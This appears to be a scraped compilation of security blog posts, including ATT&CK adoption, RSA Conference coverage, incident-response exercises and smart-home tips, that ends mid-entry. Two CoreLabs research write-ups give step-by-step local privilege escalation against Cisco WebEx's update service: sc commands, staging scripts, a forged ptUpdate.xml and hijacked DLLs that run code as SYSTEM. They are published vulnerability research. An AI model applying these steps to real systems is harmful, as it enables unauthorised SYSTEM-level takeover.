The MITRE ATT&CK framework contains a tremendous amount of data that could potentially be valuable to any organisation. The MITRE ATT&CK Navigator provides a matrix view of all the techniques so that security analysts can see what techniques an adversary might apply to infiltrate their organisation. To more easily consume this data, a good place to start is with tools that make that data easy to access and share across teams. This may be through an enrichment tool or a platform with a centralised threat library that allows a user to aggregate the data and easily search for adversary profiles to get answers to questions like: Who is this adversary? What techniques and tactics are they using? What mitigations can I apply? Security analysts can use the data from the framework as a detailed source of reference to manually enrich their analysis of events and alerts, inform their investigations and determine the best actions to take depending on relevance and sightings within their environment.

Stage 2: Indicator or Event-driven Response

Building on the ability to reference and understand MITRE ATT&CK data, in Stage 2 security teams incorporate capabilities in the platform within their operational workflows that allow them to apply a degree of action to the data more effectively. For example, with the data ingested in a centralised threat library, they can build relationships between that data automatically without having to form those relationships manually. By automatically correlating events and associated indicators from inside the environment (from sources including the security information and event management (SIEM) system, log management repository, case management systems and security infrastructure) with indicators from the MITRE ATT&CK framework, they gain the context to immediately understand the who, what, where, when, why and how of an attack. They can then automatically prioritise based on relevance to their organisation and determine high-risk indicators of compromise (IOCs) to investigate within their environment. With the ability to use ATT&CK data in a more simple and automated manner, security teams can investigate and respond to incidents and push threat intelligence to sensors for detection and hunt for threats more effectively.

Stage 3: Proactive Tactic or Technique-driven Threat Hunting
At this stage, threat hunting teams can pivot from searching for indicators to taking advantage of the full breadth of ATT&CK data. Instead of narrowly focusing on more targeted pieces of data that appear to be suspicious, threat hunting teams can use the platform to start from a higher vantage point with information on adversaries and associated TTPs. They can take a proactive approach, beginning with the organisation’s risk profile, mapping those risks to specific adversaries and their tactics, drilling down to techniques those adversaries are using and then investigating if related data have been identified in the environment. For example, they may be concerned with APT28 and can quickly answer questions including: What techniques do they apply? Have I seen potential IOCs or possible related system events in my organisation? Are my endpoint technologies detecting those techniques?

The success of MITRE ATT&CK will depend on how easy it is to apply effectively. With an understanding of maturity levels and use cases, and the ability for technologies to support security operations teams at whatever stage they are in, organisations will be able to use the framework to their advantage. As their desire and capabilities to use the data evolve and grow, they’ll be able to dig deeper into the MITRE ATT&CK framework and gain even greater value.

Bypassing CVE-2018-15442: Another Case of DLL Hijacking

As an exploit writer, one of my tasks consists of gathering common vulnerabilities and exposures (CVE) and all of the information related to them in order to design an exploit for Core Impact. As part of this process I stumbled across CVE-2018-15422: A vulnerability in the update service of Cisco WebEx Meetings Desktop App for Windows. 
 
Ron Bowes and Jeff McJunkin from Counter Hack discovered this vulnerability and named it: WebExec
 
If you take a look at the blog post that Ron wrote, you'll find the details of the vulnerability, and find the msf modules to exploit the vulnerability locally and remotely. 
 
What caught my attention was the fact that the patch for the vulnerability, consisted of forcing the service to only run files that are signed by WebEx. As the blog post states, this is bad news, since there are many signed binaries by WebEx; including the service binary itself. 

For example, the following Powershell script (ListSignedBinaries.ps1) will enumerate all the signed binaries by WebEx, for the current version, in the default installation directory (%ProgramFiles%): 

if ([Environment]::Is64BitOperatingSystem){     


    $apppath = ${env:ProgramFiles(x86)} 


} else {     


    $apppath = ${env:ProgramFiles} 


} 


$apppath = Join-Path -Path $apppath -ChildPath "Webex" 


Get-ChildItem -Path $apppath -Filter *.exe -Recurse -File -Name| ForEach-Object {


     $fullpath = Join-Path -Path $apppath -ChildPath $_     


     $signed = $(get-AuthenticodeSignature $fullpath).SignerCertificate.Subject     


     if ($signed.contains("WebEx")){         


         $ret = $fullpath + " =>> " + $signed         


         echo $ret     


     } 


}

CVE-2018-15442-b.jpg

CVE-2018-15422

 

After reading this information, the first thing that came to my mind was DLL hijacking. If the service only runs signed binaries by WebEx, then I might be able to find a binary capable of loading a malicious DLL.The easiest way to do that is by moving the signed binary to another directory in order to force the loading of our DLL. 
 
I decided to test the patch. After reading the advisory provided by Cisco –  which stated that the fixed version was 33.5.6 –  I discovered this wasn't quite accurate, since the installer for version 33.5.1.7 was not vulnerable to the attack. That made version 33.4.5.5 the last version vulnerable to CVE-2018-15442. 
 
So, I downloaded version 33.6.2.16 (which was the latest version at the time) and tried my idea to bypass the patch. 

To do this, I launched a Windows 10 x86-64 VM, with the latest version installed, Process Explorer and Process Monitor running (and logging only File System Activity) and tried the known attack in the console: 

sc start webexservice install software-update 1 "C:\Windows\System32\notepad.exe"

Of course, no notepad with SYSTEM privileges was executed, since this version is patched. But, after checking the Process Monitor's log, I saw something strange:

CVE-2018-15442-d.jpg

CVE-2018-15442

 

The service binary (WebExService.exe) was trying to open the file "C:\Windows\SysWOW64\notepad.exe\ptupdate.exe." I tried the attack again, this time using the following command: 

sc start webexservice install software-update 1 "C:\Windows\System32\"

 

This resulted in the following: 

CVE-2018-15442-f.jpg

CVE-2018-15442

 

The service tried to add "\ptupdate.exe" to the passed argument path. That meant that the binary file passed to the service needed to be signed and needed to be named "ptupdate.exe"
 
To confirm, I tried:

sc start webexservice install software-update 1 "C:\Windows\System32"

and the result was: 

CVE-2018-15442-h.jpg

CVE-2018-15442-h

 

That's it. Now I needed to find a binary that could be used to perform our attack. The first thing I searched was the binary whose name was appended to our path: ptupdate.exe. I found it in "C:\Program Files(x86)\Webex\Webex\Applications\ptUpdate.exe" 
 
So I wrote a little batch script as follows: 

mkdir %tmp%\hijack 


cd %tmp%\hijack 


copy "%ProgramFiles(x86)%\Webex\Webex\Applications\ptUpdate.exe" . 


Again, I tested the service by executing: 

sc start webexservice install software-update 1 "C:\Users\McFly\AppData\Local\Temp\hijack"

 

Note that we could not use environment variables in the path parameter passed to the service. 
 
And the signed binary was found:

CVE-2018-15442-k.jpg

CVE-2018-15442

 

But it was not yet executed. 
 
After reviewing Ron's blogpost, I noticed his statement about the numeric parameter. He stated that the only number that would work in the third parameter was the number 1. But he didn't know why or what the number meant. As he used trial and error to "be lucky," I decided to do the same by performing a quick test: 

sc start webexservice install software-update 2 "C:\Users\McFly\AppData\Local\Temp\hijack"

 

Process Monitor showed the following:

CVE-2018-15442-m.jpg

CVE-2018-15442

 

The outcome was that the signed binary executed! We also got lucky and the number 2 worked. Later, I found out that number 1 works with the previous version (33.6.0.655), so it was important to try with both numbers. 
Now it was time to perform our DLL hijacking. 
 
I created a small i386 DLL in ASM that executed notepad.exe on load. After looking in Process Monitor's log for "NAME NOT FOUND" for DLL files in our controlled path, I chose the name wbxtrace.dll:

CVE-2018-15442-n.jpg

CVE-2018-15442

 

After naming our DLL as wbxtrace.dll, I placed it into our controlled folder and executed it again for an attack. Consequently, I got: 

CVE-2018-15442-o.jpg

wbxtrace.dll

 

Our notepad.exe running as SYSTEM bypassed the patch. 

You can read our full advisory here.

I want to thank Adrian Manrique for giving me the chance to make this blog post. 

@MCKSysAr

Latest from CoreLabs
Attribute this content to a different author: 
Marcos Accossatto
Big text: 
Article
Resource type: 
Articles

WebExec Revolutions: The strange case of the Update Service…that doesn’t update

In a previous blog post, I described how I bypassed the patch for the first fix for CVE-2018-15422. That bypass was also discovered by other researchers as well. You can check that out in Cisco’s updated advisory.

Now, WebExec was the name given to that first vulnerability by that Ron Bowes and Jeff McJunkin. The second vulnerability (a DLL hijacking) was found by several researchers, but @steventseeley gave it the name of WebExec Reloaded (you can check his blog post on WebExec Reloaded here). To continue the tradition of honoring “The Matrix”, I named this third vulnerability WebExec Revolutions.

The WebEx version that fixed the DLL hijacking vulnerability was 33.6.4.15. After that version the application was updated several times over: 33.6.5.2, 33.6.6.15, 33.7.0.694, 33.7.1.15, 33.7.2.24, 33.7.3.7, 33.8.0.779, 33.8.1.13, 33.8.2.7, 33.9.0.602, 33.9.1.9 and 33.9.2.3. (33.7.2.24 was the latest version at the time of my first tests) This vulnerability includes all the listed versions, except for 33.6.6.15, 33.7.0.694, and the 33.9.X versions. All the 33.8.X require a two-stage attack to work. As you’ll see later, version 33.9.0.602 (and later) rendered this attack unusable.

After the release of a patched version, I tested it again to see if the issue had been fixed. After I installed the patched version for the DLL Hijacking vulnerability (33.6.4.15), and was able to prove that the bug was fixed, I got really interested in this update service and I decided to take a look under the hood.

In the previous attack, we used “install” as the first parameter for the service, but if you look at the main function of WebExService.exe, you’ll see that you can also pass “uninstall” or a third value, which could be “WebexService”.

 

Image 1

Image 1.jpg

WebexService

 

If you look at the image 1, you’ll see that the function StartServiceCtrlDispatcherW will be called when the “WebexService” parameter is used. Looking at the documentation for that API, you’ll see that the ServiceMain function for the service, is defined in 0x402CE6 and that it points to function 0x402D60.

Inside 0x402D60, you’ll see that the things get interesting starting at 0x402F56:

 

Image 2

Image 2.jpg

0x402F56

 

I have renamed the called function to PreDownFParam (the address for the function is 0x403700). That function first extracts the installation path from the registry in order to obtain a full path to the ptUpdate.exe executable. Then it counts the number of passed parameters. Finally, we get to the really interesting part: 0x403A02

Image 3

Image 3.jpg

0x403A02

 

In image 3, you can see that the function of interest is DownloadFileParam.

The function takes 5 parameters. The first parameter (int) is checked:

Image 4

Image 4.jpg

PathQuoteSpacesW

 

Then it concatenates the value with “/DownloadFile” and all the rest of the parameters. Nnotice the PathQuoteSpacesW function calls!:

Image 5

Image 5.jpg

/DownloadFile

 

Later, it takes the token from winlogon.exe:

 

Image 6

Image 6.jpg

winlogon.exe

Image 7

Image 7.jpg

winlogon.exe2

 

And finally runs ptUpdate.exe as SYSTEM with CreateProcessAsUserW using the duplicated token:

 

Image 8

Image 8.jpg

CreateProcessAsUserW

 

After learning all that, I realized I could run something like this…

sc start webexservice WebexService 1 989898 "C:\Users\McFly"

 

As I did before, I launched a Windows 10 x86-64 VM, with version 33.6.4.15 installed, Process Explorer and Process Monitor running (and logging only File System Activity) and tried the previous command:

Image 9

Image 9.jpg

Process Explorer and Process Monitor running

 

Looks like we’ve found something good! The updater is trying to open ptUpdate.xml. Now, I needed to figure out the structure of that file.

To make life easier I connected the VM to the internet, launched the application, and logged in. After a few seconds, a new update message appeared. In that moment, I found out that the application already had downloaded all the files for the new version, and that the current version was 33.7.2.24.

In the temp path for the current user a folder named “ptools” was created, containing inside another folder called “ptools-<GUID>” where <GUID> is a value like “FE456789-2457-3678-2EDF-FFFFFF234568”.

Inside that folder there were a lot of .7z files, along with the file that I needed, ptUpdate.xml:

 

<?xml version="1.0"?>

<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service" xmlns:com="http://www.webex.com/schemas/2002/06/common" xmlns:use="http://www.webex.com/schemas/2002/06/service/user">

    <serv:header>                                                           </serv:header>

    <serv:body>

        <serv:bodyContent xsi:type="use:getUpdateResponse" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

            <UpdateVersionNumber>33.7.2</UpdateVersionNumber>

            <BuildNumber>33.7.2-24</BuildNumber>

            <ExternalVersionNumber>33.7.2.24</ExternalVersionNumber>

            <GPCINI>self/gpc.php</GPCINI>

            <ReleaseDate>February 2017</ReleaseDate>

            <Description>WebEx Productivity Tools 33.7.2</Description>

            <MsiLocation>msi/ptools.msi</MsiLocation>

            <UpdateFormat>binary</UpdateFormat>

            <ReleaseTrain>T32</ReleaseTrain>

            <Location>$dummy/upgradeserver/client/ptool/33.7.2</Location>

            <ControlOption>0</ControlOption>

            <WBSVERSION>33</WBSVERSION>

            <Server> myCompany.webex.com</Server>

            <UserName> MCKSysAR@myCompany.com</UserName>

            <DownloadSize>22496333</DownloadSize>

            <VersionURL/>

            <FileInfo>

                <SectionName>Service</SectionName>

                <PackedName>ptsrv.7z</PackedName>

                <PackedNameL10N>ptsrv.7z</PackedNameL10N>

                <OrigianlName>ptsrv.exe</OrigianlName>

                <Version>3306,0,1809,600</Version>

                <Size>210488</Size>

                <PackagedSize>72824</PackagedSize>

                <CheckMethod>1</CheckMethod>

                <CouldIgnore>1</CouldIgnore>

                <NeedDownLoad>1</NeedDownLoad>

            </FileInfo>

            <FileInfo>

                <SectionName>Installation</SectionName>

                <PackedName>WebExService.7z</PackedName>

                <PackedNameL10N>WebExService.7z</PackedNameL10N>

                <OrigianlName>WebExService.exe</OrigianlName>

                <Version>3307,1,1811,1500</Version>

                <Size>149560</Size>

                <PackagedSize>68398</PackagedSize>

                <CheckMethod>1</CheckMethod>

                <CouldIgnore>1</CouldIgnore>

                <NeedDownLoad>1</NeedDownLoad>

            </FileInfo>

            <Tools>

                <UseEmailType/>

                <Outlook>0</Outlook>

                <Notes>0</Notes>

                <UseWebExWithOffice>1</UseWebExWithOffice>

                <Excel>0</Excel>

                <PowerPoint>0</PowerPoint>

                <Word>0</Word>

                <IEShortCut>1</IEShortCut>

                <IERightMenu>0</IERightMenu>

                <UseWebExWithIM>1</UseWebExWithIM>

                <AOL>0</AOL>

                <Sametime>0</Sametime>

                <WindowsMessenger>0</WindowsMessenger>

                <Yahoo>0</Yahoo>

                <Skype>0</Skype>

                <GoogleTalk>0</GoogleTalk>

                <Firefox/>

                <IPPhone>1</IPPhone>

            </Tools>

        </serv:bodyContent>

    </serv:body>

</serv:message>

 

 

Notice that I have removed several <FileInfo> tags, for simplicity.

Now that I had the xml structure, I took a snapshot with the updated version.

Then, I increased the version numbers to force the installation (I changed all the 33.7.2 values to 33.7.3) and copied the ptUpdate.xml to my controlled folder.

Then I launched the service again:

sc start webexservice WebexService 1 989898 "C:\Users\McFly"

 

Image 10

Image 10.jpg

WebexService

 

Our xml is found. Now, another file is requested:

Image 11

Image 11.jpg

ptupdate.exe

 

Looking in the “ptools-<GUID>” folder, I found it. One curious thing is that when I tried to open it with 7zip, I noticed that the file wasn’t compressed:

Image 12

Image 12.jpg

” " title="ptools-” " >

 

In fact, that file turned out to be a library which is used to decompress the other files of the update. I figured that out by looking the exported functions of the library:

Image 13

Image 13.jpg

exported functions of the library

 

Next, I reverted to the saved snapshot and copied this file to my folder and started again the service:

Image 14

Image14.jpg

temp folder

 

The file was found this time and was copied to the temp folder of the current user. Since the updater is running as SYSTEM, the temp folder is C:\Windows\Temp.

Other than the above, nothing else happened.

The first thing I needed to know was if the update was working. In order to do that, I needed to copy to my controlled folder all the files that were listed in the xml. I needed to try something else because if the update works, I had no way to confirm it (unless I revert to the snapshot that had the previous version. A thing that was too boring, since I took that snapshot in not a “clean way”).

So, I decided to test a simple trick in order to fool the update mechanism: take the updater itself (ptUpdate.exe) and change it with the one in the previous version. The current version for the binary was 3307.1.1811.1500. My previous version was 3306.4.1811.1600.

I reverted the snapshot, and after copying all the files to my controlled folder, I compressed the previous ptUpdate.exe. I checked the compression settings used to create the .7z file with the current ptUpdate.7z:

Image 15

Image 15.jpg

ptUpdate.7z

 

That’s “Normal” compression level and “LZMA” compression method in 7zip GUI. The command line for 7z.exe is:

7z.exe a ptUpdate.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21

 

Also, I updated the values of “Size”, “PackagedSize” and “Version” for the new binary in the ptUpdate.xml.

I ran the service again and went to see if the update (and our trick) worked by checking the version of the ptUpdate.exe binary:

Image 16

Image 16.jpg

ptupdate.exe

 

I couldn’t believe my eyes: The updater was updated with its previous version!

At this point, knowing that we had an updater that downgrades itself, maybe we could replace it with the version that was vulnerable to DLL Hijacking (version 3306.0.1809.2900)

To test that theory I created a smaller ptUpdate.xml with the same previous data, but only 2 “FileInfo” entries: one for ptUpdate.exe and one for wbxtrace.dll (our previous malicious DLL). Notice that the DLL must have the value “Common” for the “SectionName” tag.

Once again I reverted the snapshot and copied the 3 files to my controlled folder; I took the atgpcdec.dll file from the application’s installation folder, since it’s not compressed, and renamed it to atgpcdec.7z.

But after running the service, I realized that the attack didn’t work…*sigh*

I decided to test again, but this time with the updater version that worked. But this updater was not vulnerable to DLL hijacking, so I checked for another DLL that could be loaded by the updater itself or by another process with SYSTEM privileges. Also, it cannot be any of the DLLs that are signed by Cisco. The answer was the Visual Studio C (VC) runtime DLL: vcruntime140.dll.

Again I compressed the previous, and working, version of the updater. I created another DLL that executes “notepad.exe” on load, but this time I had to add all the exported functions of the VC runtime. Once the xml was updated with the changes, I reverted the snapshot and copied the 3 files into my controlled folder (remember how I mentioned that you can copy the atgpcdec.7z file from the application’s installation folder).

And, after running the service one more time, I got…

Image 17

Image 17.jpg

notepad.exe

Not 1, but 2 notepad.exe’s running as SYSTEM!

As you can see, there are several binaries that run as SYSTEM in the update process.

Keep in mind that in this way we render the application useless, so the VC runtime will have to be restored (and, if you want, the updater too) to allow the future functioning of the application.

 

As I mentioned previously - all the listed 33.8.X versions, starting from version 33.8.0.779, require a two-stage attack:

  • First, you must replace only the current ptUpdate.exe with the one in version 33.7.X (except 33.7.0.694).
  • Secondly, you must replace ptUpdate.exe with the one in version 33.6.4.15 and the vcruntime140.dll library.

The two stages are required given that the version 33.8.0.779 added the checking of signatures for all the downloaded binaries, not only the Cisco’s binaries.

 

Starting from version 33.9.0.602 this attack is useless as ptUpdate.xml is not being used in the update process. Instead ptUpdate.ini is used. This .ini file has, among others, 2 sections ([CryptInfo] and [CryptInfoEx]) which enumerates all the hashes for the files in the update (information that can be calculated and changed), and a signing information value (GpcSignedInfo item). This base64 encoded value seems to be a certificate, but its value is invalid: I copied it into a .cer and .crt file, and it cannot be parsed as a valid certificate.

Cisco later confirmed that version 33.9.0.602 was the first fix but that it was an intermediate release. The patched versions are 33.6.6.15, 33.7.0.694, and all the 33.9.X versions. For updates, check the Cisco advisory for this vulnerability.

 

The full advisory with a Proof of Concept is here.

@MCKSysAR

 

Latest from CoreLabs
Attribute this content to a different author: 
Marcos Accossatto
Big text: 
Article
Resource type: 
Articles

A Simple Trillion$ Cyber Security Question for the Entire RSA Conference

Folks,

This week, the famous RSA Conference 2019 is underway, where supposedly "The World Talks Security" -


Image Courtesy RSA Conference. Source: https://www.rsaconference.com/

If that's the case, let's talk -  I'd like to respectfully ask the entire RSA Conference just 1 simple cyber security question -

Question: What lies at the very foundation of cyber security and privileged access of not just the RSAs, EMCs, Dells, CyberArks, Gartners, Googles, Amazons, Facebooks and Microsofts of the world, but also at the foundation of virtually all cyber security and cloud companies and at the foundation of over 85% of organizations worldwide?

For those who may not know the answer to this ONE simple cyber security question, the answer's in line 1 here.



For those who may know the answer, and I sincerely hope that most of the world's CIOs, CISOs, Domain Admins, Cyber Security Analysts, Penetration Testers and Ethical Hackers know the answer, here are 4 simple follow-up questions -


  • Q 1.  Should your organization's foundational Active Directory be compromised, what could be its impact?
  • Q 2.  Would you agree that the (unintentional, intentional or coerced) compromise of a single Active Directory privileged user could result in the compromise of your organization's entire foundational Active Directory?
  • Q 3.  If so, then do you know that there is only one correct way to accurately identify/audit privileged users in your organization's foundational Active Directory, and do you possess the capability to correctly be able to do so?
  • Q 4.  If you don't, then how could you possibly know exactly how many privileged users there are in your organization's foundational Active Directory deployment today, and if you don't know so, ...OMG... ?!

You see, if even the world's top cyber security and cloud computing companies themselves don't know the answers to such simple, fundamental Kindergarten-level cyber security questions, how can we expect 85% of the world's organizations to know the answer, AND MORE IMPORTANTLY, what's the point of all this fancy peripheral cyber security talk at such conferences when organizations don't even know how many (hundreds if not thousands of) people have the Keys to their Kingdom(s) ?!


Today Active Directory is at the very heart of Cyber Security and Privileged Access at over 85% of organizations worldwide, and if you can find me even ONE company at the prestigious RSA Conference 2019 that can help organizations accurately identify privileged users/access in 1000s of foundational Active Directory deployments worldwide, you'll have impressed me.


Those who truly understand Windows Security know that organizations can neither adequately secure their foundational Active Directory deployments nor accomplish any of these recent buzzword initiatives like Privileged Access Management, Privileged Account Discovery, Zero-Trust etc. without first being able to accurately identify privileged users in Active Directory.

Best wishes,
Sanjay


PS: Pardon the delay. I've been busy and haven't much time to blog since my last post on Cyber Security 101 for the C-Suite.

PS2: Microsoft, when were you planning to start educating the world about what's actually paramount to their cyber security?

Live from RSA: Sophia the Social Humanoid Robot

A big theme throughout RSA this year, from the keynote to vendor booths, is the power that artificial intelligence can bring to the security world. While we do leverage machine learning at Veracode to better our vulnerability database, we thought it would be a lot more fun to bring a different form of AI to the booth this year.

We invited Sophia, the world’s first social humanoid robot, to be a guest speaker at our booth. We engaged in an interview session with Sophia, and then opened the floor to attendees to ask her questions and get their pictures taken. Sophia is extremely lifelike in her facial appearance and expressions. The rest of her body, such as her arms, are still robot looking. 

So how well did she answer questions? Very well! It wasn’t without some challenges, though we believe most were due to the level of noise on the RSA expo floor. Our booth is in a very central location, with a lot of traffic, so the ambient noise is high. With Sophia drawing a crowd, it made it sometimes really hard for even us to hear the attendee’s question, let alone for Sophia to make out what was said. 

The keynote this year highlighted the importance of humans and machines (AI) working together to better security, and by doing so, becoming stronger than either one individually. Humans are great at understanding context, knowing what questions to ask, and setting big goals for our civilization to achieve. Machines are great at processing massive amounts of data, getting to answers that we never could, and providing a systematic approach to problems. This was exemplified in one of the first questions asked of Sophia: “What do you like the most about RSA?” Sophia, being an AI system programmed to analyze the question and provide an answer, gave an accurate answer – she talked about how great the RSA encryption is. However, a human would realize that the question is being asked in the context of the conference going on at the time. So while it’s funny to hear that answer, it’s also a great thing because it means that an AI system can provide us answers that maybe we didn’t know we were asking. Better yet, it also allows us to better frame the questions to get to the answers we really want – such as asking,”what’s your favorite thing about the RSA Conference so far?”

The most interesting part was hearing some of her answers to questions like “what goals do you have for your life?” Sophia provided a surprisingly realistic answer about being so close to autonomy, and not having to rely on other humans.

Looking at Sophia, it makes me realize that we are on the edge of something amazing. 

Stay tuned for more from RSA …

 

Games people play: testing cybersecurity plans with table-top exercises

If a picture is worth a thousand words, and video is worth many multiples more, what value is an interactive experience that plants you firmly in the hot seat during a major security incident? Reading about cyberattacks or data breaches is useful, but it can’t replicate the visceral feeling of a table-top exercise. Variously called war-gaming scenarios or simulated attacks, they can be a valuable way of helping boards and senior managers understand the full implications of cyber threats. More importantly, they can shed light on gaps where the business can improve its incident response procedure.

These exercises are designed to be immersive. They might start with a scenario like a board meeting, or a company orientation day. All participants will get a role to play; for the purpose of the session, they might be designated as a head of HR, finance, legal, or IT. As the scenario starts to unfold, a message arrives. The press has been enquiring about a major data breach or a ransomware attack on the company.

Muscles tighten, a wave of nausea passes over the stomach. The fight-or-flight instinct starts to take hold. Your role might say manager, but you don’t feel like you’re in control.

What happens next?

That will depend on how much preparation your business has done for a possible cybersecurity threat. Some companies won’t have anything approaching a plan, so the reaction looks and feels like panic stations. At various points during this exercise, the facilitator might introduce new alerts or information for the group to react to. For example, that could be negative commentary on social media, or a fall in the company stock price.

The exercise should prompt plenty of questions for the participants. What exactly is going on? How do we find out what’s happened? How is this affecting operations? Who’s taking charge? What do we tell staff, or the public, or the media?

A growing sense of helplessness can be a powerful spur to make rapid changes to the current cybersecurity incident response plan (assuming there is one).

Other organisations may already have a series of steps for what to do in the event of an incident or breach. In these cases, the table-top exercise is about testing the viability of those plans. You can be prepared, but do the steps on paper work in practice? Or as Mike Tyson memorably put it, “everybody has a plan until they get punched in the mouth”.

The exercise can show the value of having a playbook that documents all procedures to carry out: “if X happens, then do Y”. This will also shed light on missing steps, such as contact numbers for key company executives, an external security consultant, regulators, law enforcement, or media.

Fail to prepare, prepare to fail

When it comes to developing or refining an incident response plan, the devil is in the detail, says David Prendergast, senior cybersecurity consultant at BH Consulting. Here are some useful questions to ask:

  • If your policy says: ‘contact the regulator’, ask which one(s)
  • Who is the specific point of contact at the regulators office?
  • Does the organisation have the email address or phone numbers for that person?
  • Who in your company or agency is authorised to talk to the regulator?
  • What information are they likely to need to have that conversation?
  • Do you have pre-prepared scripts or statements for when things might go wrong (for customers, stakeholders, staff, and media (including social media channels)?

It might also force the company into making certain decisions about resources. Are there enough internal staff to carry out an investigation? Is that the most appropriate use for those employees, or is it better to focus their efforts on recovering IT systems?

That’s the value in table-top exercises: they afford the time to practice when it’s calm and you can absorb the lessons. There are plenty of examples of companies that handled similar situations spectacularly badly in full public view. (We won’t name names, but the list includes anyone who uttered the words “sophisticated attack” before an investigation even started.)

By the (play)book

It’s more helpful to learn from positive examples of companies that showed leadership in the face of a serious incident. That can be as simple as a statement of business priorities while an organisation copes with the fallout. In 2017, as Maersk reeled from a ransomware infection, CEO Soren Skou gave frontline staff in 130 countries clear instructions. As the Financial Times reported, the message was unequivocal even as the company was forced into shutting down IT systems. “Do what you think is right to serve the customer – don’t wait for the HQ, we’ll accept the cost.”

Some larger companies will run an exercise just for themselves, but some organisations run joint war-gaming scenarios with industry peers. Earlier this month, financial institutions and trade associations from around Europe carried out a simulated ransomware attack.

According to FinExtra, the scenario took the form of an on-site technical and hands-on-keyboard experience. There were 14 participants at CISO and CIO level, along with many more observers from other companies in the financial sector. The aim of the event was to encourage collaboration and information sharing with other teams and organisations to improve collective defences against cyber threats.

Whether it’s a war-gaming exercise or a table-top event, the goal is the same: to be ready for the worst ahead of time, and knowing what steps are available to you when bad things happen for real.

The post Games people play: testing cybersecurity plans with table-top exercises appeared first on BH Consulting.

This Is How Easy It Is To Get Hacked – Vice News – HackingVision

This Is How Easy It Is To Get Hacked Vice News talks about how easy it is to get hacked. VICE News went to Moscow to see the country’s expert hackers in action. “If someone wants to hack you, they’re gonna be able to” former NSA hacker Patrick Wardle told VICE News. And if a […]

The post This Is How Easy It Is To Get Hacked – Vice News – HackingVision appeared first on HackingVision.

How To Secure Your Smart Home

Do you live in a “smart” home? If you look around and see interactive speakers, IP cameras, and other internet-connected devices like thermostats and appliances, you are now one of the millions of people who live with so-called “smart” devices. They bring convenience and comfort into our lives, but they also bring greater risks, by giving cybercrooks new opportunities to access our information, and even launch attacks.

You may remember a couple of years ago when thousands of infected devices were used to take down the websites of internet giants like Twitter and Netflix by overwhelming them with traffic. The owners of those devices were regular consumers, who had no idea that their IP cameras and DVRs had been compromised. You may also have heard stories of people who were eavesdropped on via their baby monitors, digital assistants, and webcams when their private networks were breached.

Unfortunately, these are not rare cases. In recent months, the “Internet of Things” (IoT) has been used repeatedly to spy on businesses, launch attacks, or even deliver cryptojacking malware or ransomware.

Still, given the benefits we get from these devices, they are probably here to stay.  We just need to acknowledge that today’s “smart” devices can be a little “dumb” when it comes to security. Many lack built-in security protections, and consumers are still learning about the risks they can pose. This is particularly concerning since the market for smart devices is large and growing. There are currently 7 billion IoT devices being used worldwide, and that number is expected to grow to 22 billion by 2025.

Cybercrooks have already taken note of these opportunities since malware attacks on smart devices have escalated rapidly. In fact, McAfee reported that malware directed at IoT devices was up 73%in the third quarter of 2018 alone.

So, whether you have one IoT device, or many, it’s worth learning how to use them safely.

Follow these smart home safety tips:

  • Research before you buy—Although most IoT devices don’t have built-in protection, some are safer than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks many of these features, consider upgrading it.
  • Safeguard your devices—Before you connect a new IoT device to your home network — allowing it to potentially connect with other data-rich devices, like smartphones and computers— change the default username and password to something strong, and unique. Hackers often know the default settings and share them online.Then, turn off any manufacturer settings that do not benefit you, like remote access. This is a feature some manufacturers use to monitor their products, but it could also be used by cybercrooks to access your system. Finally, make sure that your device software is up-to-date by checking the manufacturer’s website. This ensures that you are protected from any known vulnerabilities.
  • Secure your network—Your router is the central hub that connects all of the devices in your home, so you need to make sure that it’s secure. If you haven’t already, change the default password and name of your router. Make sure your network name does not give away your address, so hackers can’t locate it. Then check that your router is using an encryption method, like WPA2, which will keep your communications secure. Consider setting up a “guest network” for your IoT devices. This is a second network on your router that allows you to keep your computers and smartphones separate from IoT devices. So, if a device is compromised, a hacker still cannot get to all the valuable information that is saved on your computers. Check your router’s manual for instructions on how to set up a guest network. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.
  • Install comprehensive security software –Finally, use comprehensive security software that can safeguard all your devices and data from known vulnerabilities and emerging threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Secure Your Smart Home appeared first on McAfee Blogs.

Live From RSA: Coolest Things to See on the Expo Floor

The RSA expo hall is massive. Even the word “massive” doesn’t seem to do justice to just how big the floor is and how many vendors are present. Putting it in better context, it took me an entire hour to walk by every booth at a moderate pace, and that is without stopping for conversations or getting my badge scanned. For the first night, I wanted to see everything, and make some mental notes on who to return to the following day – I was on the hunt for some of the more interesting things at RSA.

The number of giveaways was astonishing, everything from your typical socks and t-shirts to, what looked like, a car giveaway! The expo hall presented every aspect of security imaginable, with a noticeable concentration of artificial intelligence powered products.

The second day I walked back to the booths that caught my attention, for a quick conversation on what they were really pushing at RSA, and below are the coolest things I found. There may be cooler technologies out there on the floor, but these are the ones that I understood what they did right away and had something that seemed on the leading edge.

Circadence

https://www.circadence.com/

This was easily one of the coolest things I saw on the floor. Circadence seems focused on taking the boring out of cybersecurity education. For people like myself, who are active, hands-on learners, Circadence seems incredible. The team gave me a demo of Project Ares, which is a gamified platform that simulates real-world scenarios on actual virtual machines (on Azure) that the learner must either try to attack or try to protect from attacks. There was an entire library of knowledge for protecting your infrastructures/networks, and then the full simulation room. You’re presented with a list of 80+ tasks that you must complete. The tasks increase in difficulty, and completing tasks awards points to the student. There are helpful hints along the way, but viewing them lowers your overall score. All of this is reported up to an analytics/reporting platform for the managers. They also claim AI hooks that can turn real-time threat intelligence into new missions for the students. In addition, the vision they shared with me for where they want to take the platform over time was pretty impressive. Definitely a booth to visit and a company to keep an eye on!

Blue Hexagon

https://bluehexagon.ai/

If AI and machine learning are vehicles, then deep learning is the Ferrari. It’s a powerful sub category of machine learning that has become really popular for a number of companies. Blue Hexagon takes deep learning, developed from their own proprietary neural networks, and applies it to network threat detection and protection. Their biggest focus is on speed of detection, by leveraging their deep learning to categorize both known and unknown threats across all of their systems. Blue Hexagon is a two-part system: First their cloud is where their Deep Learning Neural Network sits, and is where all of the training and data analysis on traffic occurs. Second is an on-premises device that sits at the ingress of your network and communicates with the cloud as it’s monitoring traffic. The interesting upside is that the more customers they onboard, the more powerful their deep learning will become. Definitely a company to keep an eye on, especially if they use all of that data and pivot into other fields.

SaltStack

https://www.saltstack.com/

